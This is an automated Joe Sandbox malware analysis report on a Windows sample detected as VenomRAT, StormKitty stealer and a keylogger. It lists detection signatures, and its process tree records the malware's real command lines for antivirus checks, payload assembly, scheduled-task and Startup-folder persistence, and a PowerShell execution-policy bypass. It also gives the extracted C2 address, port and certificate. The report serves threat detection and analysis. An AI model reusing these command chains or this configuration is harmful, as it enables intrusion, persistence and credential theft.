Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ADFoyxP.exe

Overview

General Information

Sample name:ADFoyxP.exe
Analysis ID:1631942
MD5:45c1abfb717e3ef5223be0bfc51df2de
SHA1:4c074ea54a1749bf1e387f611dea0d940deea803
SHA256:b01d928331e2b87a961b1a5953bc7dbb8d757c250f1343d731e3b6bb20591243
Tags:AsyncRATAutoITexeStormKittyuser-aachum
Infos:

Detection

KeyLogger, StormKitty, VenomRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected BrowserPasswordDump
Yara detected Keylogger Generic
Yara detected Powershell download and execute
Yara detected StormKitty Stealer
Yara detected VenomRAT
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Publisher Attachment File Dropped In Suspicious Location
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ADFoyxP.exe (PID: 2724 cmdline: "C:\Users\user\Desktop\ADFoyxP.exe" MD5: 45C1ABFB717E3EF5223BE0BFC51DF2DE)
    • cmd.exe (PID: 7444 cmdline: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • expand.exe (PID: 7496 cmdline: expand Go.pub Go.pub.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
      • tasklist.exe (PID: 7544 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7552 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7588 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7596 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7652 cmdline: cmd /c md 353090 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7672 cmdline: extrac32 /Y /E Really.pub MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7692 cmdline: findstr /V "posted" Good MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7708 cmdline: cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7724 cmdline: cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Seat.com (PID: 7740 cmdline: Seat.com m MD5: 62D09F076E6E0240548C2F837536A46A)
        • cmd.exe (PID: 7776 cmdline: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7824 cmdline: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 7840 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 8140 cmdline: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7708 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • curcuma.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Temp\curcuma.exe" MD5: 38C5F131B71B5FDC82CFBA091A2D34A0)
                • chrome.exe (PID: 3528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
                  • chrome.exe (PID: 7940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,5305006061332576876,17319552954880503810,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
                • msedge.exe (PID: 5652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
                  • msedge.exe (PID: 748 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2096,i,2842194220783237697,10925811508381354400,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • choice.exe (PID: 7756 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7896 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TradeHub.com (PID: 7944 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 8008 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TradeHub.com (PID: 8052 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • msedge.exe (PID: 4660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 6200 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2752 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 4116 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 5476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6988 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 6380 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 7404 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7396 --field-trial-handle=2228,i,3676741929503588112,17871370342743510954,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, 404KeyLogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: VenomRAT

{"Host": ["45.95.18.173"], "Port": ["4449"], "Version": "RAT + hVNC  6.0.6", "Install": "false", "Mutex": "vrecmkjrenno", "Certificate": "MIICLjCCAZegAwIBAgIVAJG/HBU0MsE8hj+URfFohwhsyC2LMA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDA1MTgyMTAzNTJaFw0zNTAyMjUyMTAzNTJaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDFfCE5H2StBn0fyU8L2ZZwJySL2LPG4qOPI/mp82dTmQeWziNGTMPoispy8p90WLtoBYuBD/kVBcU8i+yuF6901YHJ0ElKMrnuZyG/ajtEWPKEtHY2bLVMp/qKQ88ZKuvyKoo6PUqDbA/FmAfrXpUo/r/zIsbbKeW+3ITr86/n0QIDAQABozIwMDAdBgNVHQ4EFgQU7dxnglnWaiPzJgkcsN7JYR0itYkwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQCqr91VS33G3gI+NH2LwgXkC91jhVe4BOGpmHS+qXSgRoV0BQWI0lCohLkNqIvr15aKjJngDHKNVjWuCu/b8qKPTLwMUSanf5Do5+OD4N56vmTIZmqcpNDxQ6xZMeKF9+gC/W3U6+Ctn0m4P3Cp1gyVsJFwcCMUdGv7nK+YfvA9PA==", "Server Signature": "oYOqTjVKHp4zYZNcsu6b7PnQbByn94iLY8DZEegmV/zAco8OHoGu0fjzQ41fbgwdTZVeYTto/rUTBR7ZmhIslbI9cROHYMfI8Jg8SOCsGZKMvNM5Yxe4VuIO4ByTkiGRBYRNRdnQoF4two/3vM15gcnDLOWnsjvFYEMdFfPFLrg="}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000024.00000002.2543057851.00007FF7C7371000.00000004.00000001.01000000.0000000C.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x30c83:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000025.00000002.2542566206.000001FD691D0000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x30693:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VenomRATYara detected VenomRATJoe Security
    0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
      0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        30.2.RegAsm.exe.1300000.1.unpackJoeSecurity_VenomRATYara detected VenomRATJoe Security
          30.2.RegAsm.exe.1300000.1.unpackJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
            30.2.RegAsm.exe.1300000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              30.2.RegAsm.exe.1300000.1.unpackJoeSecurity_BrowserPasswordDump_1Yara detected BrowserPasswordDumpJoe Security
                30.2.RegAsm.exe.1300000.1.unpackJoeSecurity_Keylogger_Generic_3Yara detected Keylogger GenericJoe Security
                  Click to see the 25 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
                  Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ParentCommandLine: Seat.com m, ParentImage: C:\Users\user\AppData\Local\Temp\353090\Seat.com, ParentProcessId: 7740, ParentProcessName: Seat.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ProcessId: 8140, ProcessName: RegAsm.exe
                  Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7776, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 7824, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , ProcessId: 7708, ProcessName: powershell.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 7896, ProcessName: wscript.exe
                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ParentCommandLine: Seat.com m, ParentImage: C:\Users\user\AppData\Local\Temp\353090\Seat.com, ParentProcessId: 7740, ParentProcessName: Seat.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe, ProcessId: 8140, ProcessName: RegAsm.exe
                  Sigma detected: Publisher Attachment File Dropped In Suspicious Location
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\ADFoyxP.exe, ProcessId: 2724, TargetFilename: C:\Users\user\AppData\Local\Temp\Argentina.pub
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7776, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 7824, ProcessName: schtasks.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 7896, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' , ProcessId: 7708, ProcessName: powershell.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7840, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Sigma detected: Search for Antivirus process
                  Source: Process startedAuthor: Joe Security: Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 7596, ProcessName: findstr.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T17:34:20.204153+010020283713Unknown Traffic192.168.2.662055104.21.32.1443TCP
                  2025-03-07T17:34:23.352642+010020283713Unknown Traffic192.168.2.662056104.21.32.1443TCP
                  2025-03-07T17:34:25.808619+010020283713Unknown Traffic192.168.2.662057104.21.32.1443TCP
                  2025-03-07T17:35:04.990412+010020283713Unknown Traffic192.168.2.662184104.21.32.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T17:34:04.092354+010028424781Malware Command and Control Activity Detected45.95.18.1734449192.168.2.649690TCP
                  2025-03-07T17:34:09.815827+010028424781Malware Command and Control Activity Detected45.95.18.1734449192.168.2.662054TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
